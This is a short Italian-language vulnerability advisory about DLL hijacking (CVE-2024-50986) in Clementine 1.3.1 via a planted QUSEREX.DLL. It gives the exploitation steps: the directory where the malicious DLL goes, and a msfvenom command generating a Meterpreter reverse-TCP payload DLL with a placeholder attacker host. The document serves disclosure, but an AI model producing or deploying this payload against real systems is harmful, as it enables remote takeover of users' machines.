
Un problema in Clementine v.1.3.1 consente a un attaccante locale di eseguire codice arbitrario tramite un file DLL appositamente creato (DLL Hijacking)
Descrizione: Un problema in Clementine v.1.3.1 consente a un attaccante locale di eseguire codice arbitrario tramite un file DLL appositamente progettato.
Versione interessata: Clementine v.1.3.1
Ricercatore: Utkarsh (r1971d3) LinkedIn
Link CVE NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-50986
Tipo di vulnerabilità: Percorso di ricerca non attendibile
Componente interessato: QUSEREX.DLL
Per sfruttare questa vulnerabilità, un attaccante deve creare una DLL dannosa chiamata QUSEREX.DLL e posizionarla nella directory: C:\Users<username>\AppData\Local\Microsoft\WindowsApps. Quando l'applicazione Clementine viene avviata, caricherà la DLL dannosa, eseguendo il codice dell'attaccante.


sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL



